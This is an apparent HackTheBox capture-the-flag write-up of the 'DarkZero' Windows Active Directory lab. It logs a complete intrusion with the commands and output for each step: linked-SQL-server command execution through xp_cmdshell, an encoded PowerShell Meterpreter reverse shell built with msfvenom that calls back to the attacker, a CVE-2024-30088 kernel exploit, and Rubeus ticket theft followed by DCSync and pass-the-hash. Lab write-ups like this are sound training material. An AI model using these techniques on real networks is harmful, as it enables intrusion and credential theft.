< BACK TO HUB
HARD DIFFICULTY

DARKZERO

TARGET OS: WINDOWS | AUTHOR: LEANDROS

DarkZero is an intense, Hard-rated Windows Active Directory environment on HackTheBox that tests advanced enterprise exploitation techniques. The intrusion began by accessing an exposed MS-SQL instance using known credentials, allowing me to discover and exploit a Linked SQL Server for remote code execution. After securing a Meterpreter session, I escalated to SYSTEM by exploiting a modern Windows Kernel Race Condition (CVE-2024-30088). Finally, I forced the primary Domain Controller to authenticate to my compromised instance, captured its TGT using Rubeus, and executed a DCSync attack via Pass-The-Ticket to dump the Domain Administrator's NTLM hash. Here is my complete mission log.

PHASE 1: RECONNAISSANCE

I initiated the engagement with an Nmap TCP port scan to map out the target's external attack surface.

TERMINAL - NMAP TCP SCAN
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>
nmap -sCV -p<PORTS> <IP>
OUTPUT
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-ntlm-info: 
|     Target_Name: darkzero
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: darkzero.htb
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
...

The scan revealed a standard Active Directory Domain Controller profile (Kerberos, LDAP, SMB, WinRM) along with an exposed Microsoft SQL Server (port 1433). The SSL certificates and NTLM info leaked the domain name darkzero.htb and the hostname DC01.darkzero.htb.

I added these to my /etc/hosts file and performed a quick DNS zone transfer/query check using dig, which didn't reveal anything unusual. Since this is an HTB machine, I tested a set of known default credentials (john.w : RFulUtONCOL!) against the MS-SQL instance using Impacket.

TERMINAL - MSSQLCLIENT
impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!@<IP>' -windows-auth

The credentials worked, granting me access to the SQL interface!

PHASE 2: LINKED SERVER EXPLOITATION

While interacting with the database, I noticed that `xp_dirtree` was enabled, allowing me to list files on the C:\ drive. However, my primary goal was achieving remote code execution. I executed the enum_links command to check for any Linked SQL Servers.

[!] VULNERABILITY DETECTED: MISCONFIGURED LINKED SQL SERVERS

In enterprise environments, SQL servers are often linked to allow querying across different databases. If a linked server is configured to authenticate using a highly privileged service account, an attacker can use the AT command to execute queries (or enable xp_cmdshell) on the remote server, effectively pivoting their execution context across the network!

TERMINAL - SQL ENUMERATION
SQL (darkzero\john.w  guest@master)> enum_links

SRV_NAME            SRV_DATASOURCE      
-----------------   -----------------   
DC01                DC01                
DC02.darkzero.ext   DC02.darkzero.ext   

Linked Server       Local Login       Remote Login   
-----------------   ---------------   ------------   
DC02.darkzero.ext   darkzero\john.w   dc01_sql_svc

I found a linked server named DC02.darkzero.ext. Even better, queries sent to this server authenticate as dc01_sql_svc. I tested my privileges on DC02 by querying its version and enabling xp_cmdshell.

SQL - ENABLING XP_CMDSHELL
EXECUTE ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [DC02.darkzero.ext];
EXECUTE ('EXEC xp_cmdshell ''whoami''') AT [DC02.darkzero.ext];
OUTPUT
output                 
--------------------   
darkzero-ext\svc_sql

Success! I could execute arbitrary system commands on DC02 as the svc_sql service account. To gain a stable foothold, I generated an obfuscated PowerShell reverse shell using msfvenom.

TERMINAL - MSFVENOM PAYLOAD
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh-cmd

I started a Metasploit listener (exploit/multi/handler) and passed the generated Base64 PowerShell command directly into xp_cmdshell.

SQL - REVERSE SHELL INJECTION
EXECUTE ('EXEC xp_cmdshell ''powershell -nop -w hidden -e aQBmACgAWw...<BASE64>...''') AT [DC02.darkzero.ext];

The payload executed, and Metasploit caught an active Meterpreter session as darkzero-ext\svc_sql.

PHASE 3: LOCAL PRIVILEGE ESCALATION

With a Meterpreter shell established, I backgrounded the session and ran Metasploit's local_exploit_suggester module to hunt for privilege escalation vectors on the DC02 container.

TERMINAL - EXPLOIT SUGGESTER
[*] 172.16.20.2 - Collecting local exploits for x64/windows...
[+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113

[!] EXPLOIT STRATEGY: CVE-2024-30088 (AUTHZ RACE CONDITION)

CVE-2024-30088 is a Time-of-Check to Time-of-Use (TOCTOU) race condition vulnerability in the Windows Kernel's Authz API. By rapidly triggering token access checks while simultaneously swapping the target token in memory, an unprivileged user can trick the kernel into returning a handle to a highly privileged `NT AUTHORITY\SYSTEM` token, which can then be duplicated and applied to the attacker's process.

I loaded the module for CVE-2024-30088, assigned it to my session, disabled AutoCheck, and fired the exploit. Because it relies on a race condition, it took quite a few attempts to win the race, but eventually, the injection succeeded.

TERMINAL - KERNEL EXPLOITATION
use exploit/windows/local/cve_2024_30088_authz_basep
set LHOST tun0
set LPORT <PORT>
set AutoCheck false
exploit
OUTPUT
[*] Reflectively injecting the DLL into 3728...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 2272
[*] Meterpreter session 2 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

The race was won, and I secured a SYSTEM shell on DC02, retrieving the user.txt flag.

PHASE 4: PASS-THE-TICKET & DCSYNC

Although I had SYSTEM, DC02 is just an isolated container or sub-domain. To fully compromise the network, I needed to escalate to the primary Domain Controller, DC01.darkzero.htb.

My strategy was to force DC01 to authenticate to my compromised DC02 machine. When a domain controller authenticates, it leaves behind a highly privileged Ticket Granting Ticket (TGT) in memory.

[!] EXPLOIT STRATEGY: FORCED AUTH & DCSYNC

By executing xp_dirtree from the primary SQL server (DC01) and pointing it to a UNC path hosted on our compromised server (DC02), we force DC01's machine account (DC01$) to authenticate to us.

Using the tool Rubeus, we can actively monitor memory for incoming Kerberos tickets, snatch the TGT for DC01$, and inject it into our session. Because Domain Controller machine accounts possess the DS-Replication-Get-Changes privilege by default, we can use this ticket to execute a DCSync attack, asking the domain to hand over the password hashes for any user!

First, I uploaded Rubeus.exe to the C:\Windows\Temp\ directory on DC02 via Meterpreter and started it in monitoring mode.

TERMINAL - RUBEUS MONITORING
.\Rubeus.exe monitor /interval:1 /nowrap

With Rubeus watching, I opened my original SQL connection to DC01 and triggered the forced authentication using xp_dirtree pointing back to my compromised DC02 machine.

SQL - FORCING AUTHENTICATION
xp_dirtree \\DC02.darkzero.ext\test

Instantly, Rubeus caught the incoming authentication and dumped the Base64-encoded TGT for DC01$@DARKZERO.HTB!

OUTPUT - RUBEUS
[*] 10/9/2025 6:12:43 PM UTC - Found new TGT:
  User                  :  DC01$@DARKZERO.HTB
  Base64EncodedTicket   :
    doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAg...<BASE64>...

I stopped the monitor and used Rubeus's Pass-The-Ticket (ptt) feature to inject the captured Base64 ticket directly into my current session's memory cache.

TERMINAL - PASS THE TICKET
.\Rubeus.exe ptt /ticket:doIFjDCCBYigAwIB...<BASE64>...

With the ticket successfully imported, my session now masqueraded as the primary Domain Controller. I dropped back into the Metasploit prompt, loaded the kiwi (Mimikatz) extension, and executed the DCSync attack against the target domain to dump the Administrator's hash.

TERMINAL - DCSYNC (MIMIKATZ)
load kiwi
kiwi_cmd "lsadump::dcsync /domain:darkzero.htb /all"
OUTPUT
** SAM ACCOUNT **
SAM Username         : Administrator
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Object Security ID   : S-1-5-21-1152179935-589108180-1989892463-500

Credentials:
  Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726

The DCSync was successful! Armed with the Domain Administrator's NTLM hash, I used Evil-WinRM to perform a Pass-The-Hash attack and log directly into the primary Domain Controller.

TERMINAL - PASS THE HASH (EVIL-WINRM)
evil-winrm -i <IP> -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726
OUTPUT
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

I secured an interactive administrative shell and claimed the root.txt flag. The entire domain was fully compromised.